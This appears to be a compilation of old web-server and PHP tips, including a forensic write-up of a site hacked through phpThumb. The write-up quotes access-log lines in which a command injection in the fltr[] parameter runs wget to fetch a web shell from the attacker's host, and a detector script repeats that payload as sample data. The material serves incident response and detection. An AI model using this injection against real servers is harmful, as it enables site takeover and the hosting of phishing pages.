How to block spambots by user agent using .htaccess

http://healyourchurchwebsite.com/2008/05/27/how-to-block-spambots-by-user-agent-using-htaccess/

# redirect spambots & rogue spiders to the end of the internet
Options +FollowSymlinks
RewriteEngine On
RewriteBase /
# match an empty User-Agent, or one that starts with a known scraper name
RewriteCond %{HTTP_USER_AGENT} ^$ [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSearch [OR]
RewriteCond %{HTTP_USER_AGENT} ^Microsoft\ URL [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector
# answer every matching request with 403 Forbidden and stop processing rules
RewriteRule .* - [F,L]
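The rules above are anchored with ^ and, without an [NC] flag, case-sensitive, which is easy to forget when extending the list. The following Python function is an added example (not from the original post) that evaluates the same four patterns the way mod_rewrite does, so you can see which User-Agent strings are actually caught: an absent header counts as empty, a scraper name appearing later in the string is not matched, and case differs unless you opt into case-insensitive matching. The pattern list is a constructed copy of the .htaccess conditions; the `nocase` parameter is this example's equivalent of the [NC] flag.

```python
import re

# Constructed copy of the RewriteCond patterns from the .htaccess snippet above.
BLOCKED_UA_PATTERNS = [
    r"^$",                      # empty (or missing) User-Agent header
    r"^EmailSearch",
    r"^Microsoft\ URL",         # "\ " is a literal space, as in the Apache regex
    r"^Web\ Image\ Collector",
]


def is_blocked_user_agent(user_agent, patterns=BLOCKED_UA_PATTERNS, nocase=False):
    """Return True when the User-Agent would be rejected by the rewrite rules.

    A missing header is treated as an empty string, which is what Apache
    substitutes for %{HTTP_USER_AGENT} when the client sends no User-Agent.
    nocase=True mimics adding the [NC] flag to every RewriteCond.
    """
    ua = user_agent or ""
    flags = re.IGNORECASE if nocase else 0
    return any(re.search(pattern, ua, flags) for pattern in patterns)


def classify(user_agents, nocase=False):
    """Map each User-Agent string to its verdict, for a quick review of a candidate list."""
    return {ua: is_blocked_user_agent(ua, nocase=nocase) for ua in user_agents}


if __name__ == "__main__":
    # Constructed sample User-Agent strings, not taken from any real log.
    samples = [
        "",
        "EmailSearch/1.0",
        "Microsoft URL Control - 6.00",
        "Mozilla/5.0 (compatible; EmailSearch)",   # not blocked: pattern is anchored at the start
        "emailsearch/1.0",                          # not blocked unless nocase (the [NC] flag)
    ]
    for ua, blocked in classify(samples).items():
        print("%-40r -> %s" % (ua, "403" if blocked else "allowed"))
```

Since the User-Agent header is entirely client-controlled, this kind of list only stops bots that announce themselves; it is a cheap first filter, not an access control.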

Security Compromised by phpThumb Vulnerability – Solved

Today I got an urgent message about a website that had been hacked through an open-source PHP image-manipulation library, phpThumb. phpThumb had published a security update at the end of last year (August 2011), but it had not been applied on the server.

The vulnerability is described here:

http://secunia.com/advisories/39556

http://forum.intern0t.org/exploits-vulnerabilities-pocs/2969-phpthumb-all-versions-arbitrary-command-execution.html

The attacker's footprint was as follows.

I listed all files changed in the last 2 days by going to public_html and running:

# find ./ -type f -ctime -2 -exec ls -lcr {} \; > ../last-activity.txt

Interesting results: the web shell, plus Perl and PHP files:

-rw-r--r-- 1 user user 24911 May 15 08:08 ./phpthumb/filess.php
-rw-r--r-- 1 user user 4549 May 15 08:10 ./phpthumb/cp.txt
-rw-r--r-- 1 user user 1076 May 15 08:13 ./phpthumb/confspy.log
-rw-r--r-- 1 user user 24911 May 15 08:08 ./phpthumb/filess.php.1
-rw-r--r-- 1 user user 194113 May 15 10:09 ./config.php

and the phishing pages:

-rw-r--r-- 1 user user 28469 May 15 11:36 ./webmail.uncfsu.edu.zip
-rw-r--r-- 1 user user 3669 May 15 11:37 ./webmail.uncfsu.edu/login_files/flogon.js
-rw-r--r-- 1 user user 1144 May 15 11:37 ./webmail.uncfsu.edu/login_files/lgnexlogo.gif
-rw-r--r-- 1 user user 2512 May 15 11:37 ./webmail.uncfsu.edu/login_files/lgntopr.gif
-rw-r--r-- 1 user user 3461 May 15 11:37 ./webmail.uncfsu.edu/login_files/owafont.css
-rw-r--r-- 1 user user 2310 May 15 11:37 ./webmail.uncfsu.edu/login_files/logon.css

…………………

-rw-r--r-- 1 user user 222219 May 15 15:08 ./chaseupdating.zip
-rw-r--r-- 1 user user 1245 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/M3DiJoK.php
-rw-r--r-- 1 user user 5692 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/Logon.php
-rw-r--r-- 1 user user 316 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/index.php
-rw-r--r-- 1 user user 29742 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/details.php
-rw-r--r-- 1 user user 323 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/M3DiJoK/default_bg.gif
-rw-r--r-- 1 user user 1556 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/M3DiJoK/search_button_home.gif
-rw-r--r-- 1 user user 121 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/M3DiJoK/curvebg_darkblue_right.gif

Looking through the access logs revealed the exact details of the intruder's actions:

41.138.185.64 - - [15/May/2012:08:08:51 -0600] "GET /vendors/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;wget%20http://41.138.185.64/filess.php;%20&phpThumbDebug=9 HTTP/1.1" 200 48077 "-" "Opera/9.80 (Windows NT 6.1; WOW64; U; en) Presto/2.10.229 Version/11.62"
41.138.185.64 - - [15/May/2012:08:08:58 -0600] "GET /vendors/phpthumb/filess.php HTTP/1.1" 200 471 "-" "Opera/9.80 (Windows NT 6.1; WOW64; U; en) Presto/2.10.229 Version/11.62"
41.138.185.64 - - [15/May/2012:10:09:26 -0600] "GET /config.php HTTP/1.1" 302 378 "-" "Opera/9.80 (Windows NT 6.1; WOW64; U; en) Presto/2.10.229 Version/11.62"

Looks dangerous, doesn't it?
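The three log lines tell the story on their own once you know what to look for: a phpThumb.php request whose fltr[] filter value carries shell metacharacters, the phpThumbDebug parameter set, and then the same IP fetching a PHP file that phpThumb never shipped. The script below is an added example (not part of the original post) that automates exactly that triage over Apache combined-format logs: it parses each line, decodes the query string itself (so results do not depend on which characters the standard library treats as separators), flags phpThumb requests with command-separator characters in a filter value or with phpThumbDebug present, and then pivots on the flagged IPs to list everything else they requested. The log lines are constructed for this example with documentation IP addresses and a placeholder dropped-file name; only the request shape mirrors the incident above.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample log (Apache combined format). IPs are documentation addresses,
# x.php is a placeholder for the dropped file; line 3 is a legitimate blur filter.
SAMPLE_LOG = """\
192.0.2.10 - - [15/May/2012:08:08:51 -0600] "GET /vendors/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20;wget%20http://192.0.2.10/x.php;%20&phpThumbDebug=9 HTTP/1.1" 200 48077 "-" "Opera/9.80"
192.0.2.10 - - [15/May/2012:08:08:58 -0600] "GET /vendors/phpthumb/x.php HTTP/1.1" 200 471 "-" "Opera/9.80"
198.51.100.7 - - [15/May/2012:09:12:03 -0600] "GET /vendors/phpthumb/phpThumb.php?src=images/logo.png&fltr[]=blur|3&w=120 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [15/May/2012:09:12:04 -0600] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# ip, ident, user, [timestamp], "METHOD target PROTOCOL", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Characters that chain or substitute commands in a shell. "|" is deliberately
# absent: phpThumb's own filter syntax uses it (e.g. fltr[]=blur|9).
SHELL_META = re.compile(r"[;`&]|\$\(")


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def split_query(query):
    """Split a raw query string on '&' only, then percent-decode keys and values."""
    pairs = []
    for chunk in query.split("&"):
        if not chunk:
            continue
        key, _, value = chunk.partition("=")
        pairs.append((unquote(key), unquote(value)))
    return pairs


def phpthumb_reasons(target):
    """List why a request target looks like phpThumb abuse; empty list when it does not."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/phpthumb.php"):
        return []
    reasons = []
    for key, value in split_query(parts.query):
        if key == "fltr[]" and SHELL_META.search(value):
            reasons.append("shell metacharacter in fltr[] value: %r" % value)
        elif key == "phpThumbDebug":
            reasons.append("phpThumbDebug=%s requested" % value)
    return reasons


def find_suspicious(log_text):
    """All parsed lines whose target triggers at least one reason."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        reasons = phpthumb_reasons(rec["target"])
        if reasons:
            hits.append({"ip": rec["ip"], "ts": rec["ts"], "target": rec["target"], "reasons": reasons})
    return hits


def pivot_on_ips(log_text, ips):
    """Every parsed line from the given IPs, in log order, to see what followed the initial hit."""
    return [rec for rec in map(parse_line, log_text.splitlines()) if rec and rec["ip"] in ips]


if __name__ == "__main__":
    hits = find_suspicious(SAMPLE_LOG)
    for hit in hits:
        print("%s %s %s" % (hit["ts"], hit["ip"], hit["target"]))
        for reason in hit["reasons"]:
            print("    -", reason)
    for rec in pivot_on_ips(SAMPLE_LOG, {h["ip"] for h in hits}):
        print("follow-up: %s %s %s %s" % (rec["ts"], rec["ip"], rec["target"], rec["status"]))
```

Running this against a real log would typically be `find_suspicious(open("access_log").read())`; the pivot step is what turns the single injection line into the full list of files the attacker subsequently requested, which is the list you then compare against the find output above.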

…………………

Solution:

1.) Remove the infection from the files

2.) Ensure there are no PHP shells left behind

3.) Upgrade the software and keep upgrading.

http://www.webhostingtalk.com/showthread.php?t=972669

A must-do is to keep an eye on http://secunia.com/advisories for vulnerabilities as they are disclosed.

I would suggest making a Google Docs spreadsheet to track all such cases, e.g.:

3rd party lib | installed version | released version | last check date

Fix: PHP "echo()" function performance

A few days back I was optimizing the performance of a website. After placing all the benchmark probes, I found that the echo() statement was taking almost 1.6s just to print the $string variable, which was around 100K in size. It sounds pathetic when all your DB fetching and everything else is under 0.1s and echo() takes 1.6s. It reminded me of the website phpsadness.com (which logs the big issues of PHP), shared by my colleague (kadnan) a few days back.

The actual problem:

<?php
$t1 = microtime(true);   // timestamp before output
echo $html;              // $html holds the ~100K string
$t2 = microtime(true);   // timestamp after output
echo ($t2 - $t1);        // seconds spent inside echo

I researched on the web and found that it is a known issue with Nagle's algorithm, which comes into play in PHP's echo function.

I tried print() instead; that brought it down to 1.1s, but still not what I wanted.

A solution was proposed: split the string into small pieces and echo them one by one. That improved it to 1s, but still not what I wanted.

http://www.php.net/manual/en/function.echo.php#52881

function echobig($string, $bufferSize = 8192) {
    // split the large string into chunks of $bufferSize bytes
    $splitString = str_split($string, $bufferSize);
    // echo each chunk separately instead of one huge write
    foreach ($splitString as $chunk) {
        echo $chunk;
    }
}

Promising Solution

I got this comment from a blog:
http://wonko.com/post/seeing_poor_performance_using_phps_echo_statement_heres_why#comment-5607

Guys, I think I narrowed it down even further!

As previously said, PHP buffering will let PHP race to the end of your script, but after that it will still "hang" while trying to pass all that data to Apache.

Now I was able, not only to measure this (see previous comment) but to actually eliminate the waiting period inside of PHP. I did that by increasing Apache’s SendBuffer with the SendBufferSize directive.

This pushes the data out of PHP faster. I guess the next step would be to get it out of Apache faster but I’m not sure if there is actually another configurable layer between Apache and the raw network bandwidth.

– Francois Planque

This seems very promising, as people commented, and I'll be trying it very soon.

Reference:
http://wonko.com/post/seeing_poor_performance_using_phps_echo_statement_heres_why
http://phplens.com/lens/php-book/optimizing-debugging-php.php
http://www.php.net/manual/en/function.echo.php#52881

Force Download PDF using Lighttpd

In lighttpd, to stop PDFs from opening in the browser, add the following to lighttpd.conf. This is useful for increasing CTR, as browsers often get stuck while loading PDF files.

$HTTP["url"] =~ "\.pdf$" {
    # serve PDFs as opaque binary and tell the browser to save rather than render them
    mimetype.assign = (".pdf" => "application/octet-stream")
    setenv.add-response-header = ( "Content-Disposition" => "attachment" )
}

+ Don't forget to enable the setenv module, if not already done:
server.modules += ( "mod_setenv" )

This is the lighttpd version of my previous post, which used Apache.

Sources:

http://symkat.com/tag/content-disposition/
http://www.cyberciti.biz/faq/mod_setenv-lighttpd-send-custom-headers/

$_GET size limitations

I was looking into how to send some parameters via the query string, and came to know a few things:

1. There is a limit of 256 chars (max) in the client's browser.
2. But if you use cURL or fopen to pass query-string data, on an Apache server the limit can be controlled by the 'LimitRequestFieldSize' parameter.

You can limit the size of allowed data also by the server.

See http://httpd.apache.org/docs/2.2/en/…questfieldsize
The default configuration of Apache HTTP Server allows only 4094 bytes.

Ref: http://bytes.com/topic/php/answers/658657-_get-parameter-size-limit

Online GZip Testing Tools

Sharing some online gzip testing tools for checking whether gzip is enabled on a server.

1. http://gziptest.com/

2. http://www.gidnetwork.com/tools/gzip-test.php

3. http://nontroppo.org/tools/gziptest/ (browser based testing)

Force a PDF or MP3 to download (without loading in memory)

Just add these lines to the .htaccess file, and it'll force PDF (and MP3) files to download rather than opening in Adobe Reader.

<FilesMatch "\.(?i:pdf|mp3)$">
    # ForceType is a core directive, so it works even without mod_headers
    ForceType application/octet-stream
    <IfModule mod_headers.c>
        Header set Content-Disposition attachment
    </IfModule>
</FilesMatch>

Here are the helpful links:

1. http://www.thingy-ma-jig.co.uk/blog/06-08-2007/force-a-pdf-to-download
2. http://www.askapache.com/htaccess/using-http-headers-with-htaccess.html

For lighttpd, follow this link.
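Both the lighttpd config and the .htaccess snippet above do the same two things: replace the media type with application/octet-stream and add a Content-Disposition: attachment header. The WSGI application below is an added example (not code from the original posts or from either server) that implements the same policy in Python so the behaviour can be exercised offline: extension matching is case-insensitive (as the (?i:...) group in the FilesMatch pattern makes it), non-matching files keep their normal media type, and the filename placed in the header is sanitised first, because a quote or CR/LF in a user-supplied name would otherwise let the filename break out of the header. The document root is a constructed in-memory map; `get()` is a test driver for this example, not part of any server API.

```python
import mimetypes
import os
import re
from wsgiref.util import setup_testing_defaults

# Extensions that must be downloaded rather than rendered (same set as the .htaccess rule).
FORCE_DOWNLOAD_EXTENSIONS = {".pdf", ".mp3"}

# Constructed in-memory "document root" so the example runs without a filesystem.
FILES = {
    "/docs/report.PDF": b"%PDF-1.4 constructed sample",
    "/media/song.mp3": b"ID3 constructed sample",
    "/index.html": b"<html>hello</html>",
}


def safe_filename(path):
    """Basename with anything outside a conservative allow-list replaced by '_'.

    The result is safe to place inside a quoted Content-Disposition parameter:
    no quotes, CR, LF or path separators can survive, so the header cannot be
    split or its parameter terminated early by a crafted name.
    """
    name = path.rsplit("/", 1)[-1]
    name = re.sub(r"[^A-Za-z0-9._-]", "_", name)
    return name or "download"


def response_headers(path, body_len):
    """Headers for a 200 response: forced download for listed extensions, normal otherwise."""
    ext = os.path.splitext(path)[1].lower()          # case-insensitive, like (?i:pdf|mp3)
    if ext in FORCE_DOWNLOAD_EXTENSIONS:
        return [
            ("Content-Type", "application/octet-stream"),   # ForceType / mimetype.assign
            ("Content-Disposition", 'attachment; filename="%s"' % safe_filename(path)),
            ("Content-Length", str(body_len)),
        ]
    ctype = mimetypes.guess_type(path)[0] or "application/octet-stream"
    return [("Content-Type", ctype), ("Content-Length", str(body_len))]


def app(environ, start_response):
    """Minimal WSGI app serving FILES with the forced-download policy applied."""
    path = environ.get("PATH_INFO", "/")
    body = FILES.get(path)
    if body is None:
        start_response("404 Not Found", [("Content-Type", "text/plain")])
        return [b"not found"]
    start_response("200 OK", response_headers(path, len(body)))
    return [body]


def get(path):
    """Drive the app in-process (no sockets) and return (status, headers dict, body)."""
    environ = {}
    setup_testing_defaults(environ)
    environ["PATH_INFO"] = path
    captured = {}

    def start_response(status, headers):
        captured["status"] = status
        captured["headers"] = dict(headers)

    body = b"".join(app(environ, start_response))
    return captured["status"], captured["headers"], body


if __name__ == "__main__":
    for p in ("/docs/report.PDF", "/index.html", "/missing.pdf"):
        status, headers, _ = get(p)
        print(p, status, headers.get("Content-Type"), headers.get("Content-Disposition"))
```

The sanitisation step is the part neither server snippet needs (they emit a bare `attachment` with no filename), but it matters as soon as an application sets the filename itself from user data.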